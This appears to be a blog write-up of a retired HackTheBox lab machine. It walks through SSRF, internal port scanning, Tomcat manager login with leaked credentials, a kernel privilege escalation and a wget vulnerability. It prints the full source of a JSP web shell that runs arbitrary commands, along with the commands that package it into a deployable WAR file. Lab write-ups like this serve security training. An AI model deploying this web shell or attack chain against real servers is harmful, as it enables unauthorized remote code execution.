Hackthebox retired Box
Init Foothold
We started our recon with nmap automator which showed some of the open ports.
Upon running the full scan we saw port 60000 is open with custom web app.
The site says “its a web hosting site” and has a input box asking for a url.
We put our url to test for ssrf.
Upon checking my listener i saw a request coming from the target.
Now as we have ssrf,there are some ways we can get an rce through it.But it depends on the services this box is running in the localhost.If we get the port 6379 to be open we can use the gopher protocol to exploit it.
So we quickly ran a ffuf to check all the open ports.
Note:This internal port scanning can be done with various ways.Easiest way is to use burp intruder.Since i was doing this on a test machine and didnt have burp pro i didn’t used it as the normal intruder is very slow.
In the mean while we were running ffuf on port 8080 to see if we get something and we got /manager/ to be there.
So if we can get the creds somehow we can deploy a malicious war file which will give us the shell directly.So things we need is may be exposed creds(through information disclouser) or a Local file Inclusion using which we can read the tomcat-user.xml file.
If we see the nmap results there is a port 8009 open which runs apache jserve and it it vulnerable to ghostcat which is nothing but a local file inclusion bug,which can further used to get a shell if there is a upload functionality on the target.
The above tool can be used to exploit ghostcat directly.
But unfortunately this is not useful to us as this bug can only read files that are in the classpath.not arbitary files.
So back to the internal port scanning
We see some of the ports are open .We visited them one by one but didn't found any of them to be useful except the port 888.
As you can see this port has a directory listing enabled and it hold a directory called backup,which gave us the username and password.we tried it with /manager/html/ and it worked and we got in.
We then used a simple jsp to execute code on the machine.
<FORM METHOD=GET ACTION=’index.jsp’> <INPUT name=’cmd’ type=text> <INPUT type=submit value=’Run’> </FORM> <%@ page import=”java.io.*” %> <% String cmd = request.getParameter(“cmd”); String output = “”; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd,null,null); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s+”</br>”; } } catch(IOException e) { e.printStackTrace(); } } %> <pre><%=output %></pre>
Then I created a war file by
mkdir webshell
cp index.jsp webshell/
cd webshell
jar -cvf ../webshell.war *
Once the war file is ready i deployed it and executed it.
using this I got the shell.
Priv ESC
Once i got in i tried running linpeas for some easy wins but could not found any,as this box is 4 5 years older there is good chance of kernel exploit.Linpeas also indicated the kernel version to be vulnerable.
So i tried linux-exploit-suggestor.sh and downloaded the eBPF_verifier exploit.After compiling this i ran this and i got root.
But even after getting root we didn't got the root flag.There is file on the /root called app.log which indicated that the ip 10.0.1.33 is requesting a file called .archive.tar.gz using wget 1.16.
A little googling on wget 1.16 revelaed that this vulnerable to arbiatry file upload.
We followed the below POC to get the root.txt from 10.0.1.33
Thanks For Reading
Happy Hacking
You can connect with me on
linkedin: https://www.linkedin.com/in/swagatkumar/
